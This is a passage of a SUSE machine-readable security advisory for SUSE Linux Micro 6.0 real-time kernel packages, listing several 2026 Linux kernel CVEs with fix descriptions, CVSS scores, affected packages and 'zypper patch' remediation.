"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23035",
"url": "https://www.suse.com/security/cve/CVE-2026-23035"
},
{
"category": "external",
"summary": "SUSE Bug 1257559 for CVE-2026-23035",
"url": "https://bugzilla.suse.com/1257559"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23035"
},
{
"cve": "CVE-2026-23037",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23037"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: etas_es58x: allow partial RX URB allocation to succeed\n\nWhen es58x_alloc_rx_urbs() fails to allocate the requested number of\nURBs but succeeds in allocating some, it returns an error code.\nThis causes es58x_open() to return early, skipping the cleanup label\n\u0027free_urbs\u0027, which leads to the anchored URBs being leaked.\n\nAs pointed out by maintainer Vincent Mailhol, the driver is designed\nto handle partial URB allocation gracefully. Therefore, partial\nallocation should not be treated as a fatal error.\n\nModify es58x_alloc_rx_urbs() to return 0 if at least one URB has been\nallocated, restoring the intended behavior and preventing the leak\nin es58x_open().",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23037",
"url": "https://www.suse.com/security/cve/CVE-2026-23037"
},
{
"category": "external",
"summary": "SUSE Bug 1257554 for CVE-2026-23037",
"url": "https://bugzilla.suse.com/1257554"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2026-23037"
},
{
"cve": "CVE-2026-23049",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23049"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/panel-simple: fix connector type for DataImage SCF0700C48GGU18 panel\n\nThe connector type for the DataImage SCF0700C48GGU18 panel is missing and\ndevm_drm_panel_bridge_add() requires connector type to be set. This leads\nto a warning and a backtrace in the kernel log and panel does not work:\n\"\nWARNING: CPU: 3 PID: 38 at drivers/gpu/drm/bridge/panel.c:379 devm_drm_of_get_bridge+0xac/0xb8\n\"\nThe warning is triggered by a check for valid connector type in\ndevm_drm_panel_bridge_add(). If there is no valid connector type\nset for a panel, the warning is printed and panel is not added.\nFill in the missing connector type to fix the warning and make\nthe panel operational once again.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23049",
"url": "https://www.suse.com/security/cve/CVE-2026-23049"
},
{
"category": "external",
"summary": "SUSE Bug 1257723 for CVE-2026-23049",
"url": "https://bugzilla.suse.com/1257723"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23049"
},
{
"cve": "CVE-2026-23053",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23053"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFS: Fix a deadlock involving nfs_release_folio()\n\nWang Zhaolong reports a deadlock involving NFSv4.1 state recovery\nwaiting on kthreadd, which is attempting to reclaim memory by calling\nnfs_release_folio(). The latter cannot make progress due to state\nrecovery being needed.\n\nIt seems that the only safe thing to do here is to kick off a writeback\nof the folio, without waiting for completion, or else kicking off an\nasynchronous commit.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23053",
"url": "https://www.suse.com/security/cve/CVE-2026-23053"
},
{
"category": "external",
"summary": "SUSE Bug 1257718 for CVE-2026-23053",
"url": "https://bugzilla.suse.com/1257718"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23053"
},
{
"cve": "CVE-2026-23056",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23056"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nuacce: implement mremap in uacce_vm_ops to return -EPERM\n\nThe current uacce_vm_ops does not support the mremap operation of\nvm_operations_struct. Implement .mremap to return -EPERM to remind\nusers.\n\nThe reason we need to explicitly disable mremap is that when the\ndriver does not implement .mremap, it uses the default mremap\nmethod. This could lead to a risk scenario:\n\nAn application might first mmap address p1, then mremap to p2,\nfollowed by munmap(p1), and finally munmap(p2). Since the default\nmremap copies the original vma\u0027s vm_private_data (i.e., q) to the\nnew vma, both munmap operations would trigger vma_close, causing\nq-\u003eqfr to be freed twice(qfr will be set to null here, so repeated\nrelease is ok).",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23056",
"url": "https://www.suse.com/security/cve/CVE-2026-23056"
},
{
"category": "external",
"summary": "SUSE Bug 1257729 for CVE-2026-23056",
"url": "https://bugzilla.suse.com/1257729"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23056"
},
{
"cve": "CVE-2026-23057",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23057"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvsock/virtio: Coalesce only linear skb\n\nvsock/virtio common tries to coalesce buffers in rx queue: if a linear skb\n(with a spare tail room) is followed by a small skb (length limited by\nGOOD_COPY_LEN = 128), an attempt is made to join them.\n\nSince the introduction of MSG_ZEROCOPY support, assumption that a small skb\nwill always be linear is incorrect. In the zerocopy case, data is lost and\nthe linear skb is appended with uninitialized kernel memory.\n\nOf all 3 supported virtio-based transports, only loopback-transport is\naffected. G2H virtio-transport rx queue operates on explicitly linear skbs;\nsee virtio_vsock_alloc_linear_skb() in virtio_vsock_rx_fill(). H2G\nvhost-transport may allocate non-linear skbs, but only for sizes that are\nnot considered for coalescence; see PAGE_ALLOC_COSTLY_ORDER in\nvirtio_vsock_alloc_skb().\n\nEnsure only linear skbs are coalesced. Note that skb_tailroom(last_skb) \u003e 0\nguarantees last_skb is linear.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23057",
"url": "https://www.suse.com/security/cve/CVE-2026-23057"
},
{
"category": "external",
"summary": "SUSE Bug 1257740 for CVE-2026-23057",
"url": "https://bugzilla.suse.com/1257740"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23057"
},
{
"cve": "CVE-2026-23058",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23058"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: ems_usb: ems_usb_read_bulk_callback(): fix URB memory leak\n\nFix similar memory leak as in commit 7352e1d5932a (\"can: gs_usb:\ngs_usb_receive_bulk_callback(): fix URB memory leak\").\n\nIn ems_usb_open(), the URBs for USB-in transfers are allocated, added to\nthe dev-\u003erx_submitted anchor and submitted. In the complete callback\nems_usb_read_bulk_callback(), the URBs are processed and resubmitted. In\nems_usb_close() the URBs are freed by calling\nusb_kill_anchored_urbs(\u0026dev-\u003erx_submitted).\n\nHowever, this does not take into account that the USB framework unanchors\nthe URB before the complete function is called. This means that once an\nin-URB has been completed, it is no longer anchored and is ultimately not\nreleased in ems_usb_close().\n\nFix the memory leak by anchoring the URB in the\nems_usb_read_bulk_callback() to the dev-\u003erx_submitted anchor.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23058",
"url": "https://www.suse.com/security/cve/CVE-2026-23058"
},
{
"category": "external",
"summary": "SUSE Bug 1257739 for CVE-2026-23058",
"url": "https://bugzilla.suse.com/1257739"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2026-23058"
},
{
"cve": "CVE-2026-23060",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23060"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncrypto: authencesn - reject too-short AAD (assoclen\u003c8) to match ESP/ESN spec\n\nauthencesn assumes an ESP/ESN-formatted AAD. When assoclen is shorter than\nthe minimum expected length, crypto_authenc_esn_decrypt() can advance past\nthe end of the destination scatterlist and trigger a NULL pointer dereference\nin scatterwalk_map_and_copy(), leading to a kernel panic (DoS).\n\nAdd a minimum AAD length check to fail fast on invalid inputs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23060",
"url": "https://www.suse.com/security/cve/CVE-2026-23060"
},
{
"category": "external",
"summary": "SUSE Bug 1257735 for CVE-2026-23060",
"url": "https://bugzilla.suse.com/1257735"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23060"
},
{
"cve": "CVE-2026-23061",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23061"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncan: kvaser_usb: kvaser_usb_read_bulk_callback(): fix URB memory leak\n\nFix similar memory leak as in commit 7352e1d5932a (\"can: gs_usb:\ngs_usb_receive_bulk_callback(): fix URB memory leak\").\n\nIn kvaser_usb_set_{,data_}bittiming() -\u003e kvaser_usb_setup_rx_urbs(), the\nURBs for USB-in transfers are allocated, added to the dev-\u003erx_submitted\nanchor and submitted. In the complete callback\nkvaser_usb_read_bulk_callback(), the URBs are processed and resubmitted. In\nkvaser_usb_remove_interfaces() the URBs are freed by calling\nusb_kill_anchored_urbs(\u0026dev-\u003erx_submitted).\n\nHowever, this does not take into account that the USB framework unanchors\nthe URB before the complete function is called. This means that once an\nin-URB has been completed, it is no longer anchored and is ultimately not\nreleased in usb_kill_anchored_urbs().\n\nFix the memory leak by anchoring the URB in the\nkvaser_usb_read_bulk_callback() to the dev-\u003erx_submitted anchor.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23061",
"url": "https://www.suse.com/security/cve/CVE-2026-23061"
},
{
"category": "external",
"summary": "SUSE Bug 1257776 for CVE-2026-23061",
"url": "https://bugzilla.suse.com/1257776"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23061"
},
{
"cve": "CVE-2026-23063",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23063"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nuacce: ensure safe queue release with state management\n\nDirectly calling `put_queue` carries risks since it cannot\nguarantee that resources of `uacce_queue` have been fully released\nbeforehand. So adding a `stop_queue` operation for the\nUACCE_CMD_PUT_Q command and leaving the `put_queue` operation to\nthe final resource release ensures safety.\n\nQueue states are defined as follows:\n- UACCE_Q_ZOMBIE: Initial state\n- UACCE_Q_INIT: After opening `uacce`\n- UACCE_Q_STARTED: After `start` is issued via `ioctl`\n\nWhen executing `poweroff -f` in virt while accelerator are still\nworking, `uacce_fops_release` and `uacce_remove` may execute\nconcurrently. This can cause `uacce_put_queue` within\n`uacce_fops_release` to access a NULL `ops` pointer. Therefore, add\nstate checks to prevent accessing freed pointers.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23063",
"url": "https://www.suse.com/security/cve/CVE-2026-23063"
},
{
"category": "external",
"summary": "SUSE Bug 1257722 for CVE-2026-23063",
"url": "https://bugzilla.suse.com/1257722"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23063"
},
{
"cve": "CVE-2026-23064",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23064"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: act_ife: avoid possible NULL deref\n\ntcf_ife_encode() must make sure ife_encode() does not return NULL.\n\nsyzbot reported:\n\nOops: general protection fault, probably for non-canonical address 0xdffffc0000000000: 0000 [#1] SMP KASAN NOPTI\nKASAN: null-ptr-deref in range [0x0000000000000000-0x0000000000000007]\n RIP: 0010:ife_tlv_meta_encode+0x41/0xa0 net/ife/ife.c:166\nCPU: 3 UID: 0 PID: 8990 Comm: syz.0.696 Not tainted syzkaller #0 PREEMPT(full)\nCall Trace:\n \u003cTASK\u003e\n ife_encode_meta_u32+0x153/0x180 net/sched/act_ife.c:101\n tcf_ife_encode net/sched/act_ife.c:841 [inline]\n tcf_ife_act+0x1022/0x1de0 net/sched/act_ife.c:877\n tc_act include/net/tc_wrapper.h:130 [inline]\n tcf_action_exec+0x1c0/0xa20 net/sched/act_api.c:1152\n tcf_exts_exec include/net/pkt_cls.h:349 [inline]\n mall_classify+0x1a0/0x2a0 net/sched/cls_matchall.c:42\n tc_classify include/net/tc_wrapper.h:197 [inline]\n __tcf_classify net/sched/cls_api.c:1764 [inline]\n tcf_classify+0x7f2/0x1380 net/sched/cls_api.c:1860\n multiq_classify net/sched/sch_multiq.c:39 [inline]\n multiq_enqueue+0xe0/0x510 net/sched/sch_multiq.c:66\n dev_qdisc_enqueue+0x45/0x250 net/core/dev.c:4147\n __dev_xmit_skb net/core/dev.c:4262 [inline]\n __dev_queue_xmit+0x2998/0x46c0 net/core/dev.c:4798",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-23064",
"url": "https://www.suse.com/security/cve/CVE-2026-23064"
},
{
"category": "external",
"summary": "SUSE Bug 1257765 for CVE-2026-23064",
"url": "https://bugzilla.suse.com/1257765"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2026-23064"
},
{
"cve": "CVE-2026-23068",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-23068"
}
],
"notes": [
{
"category": "general",
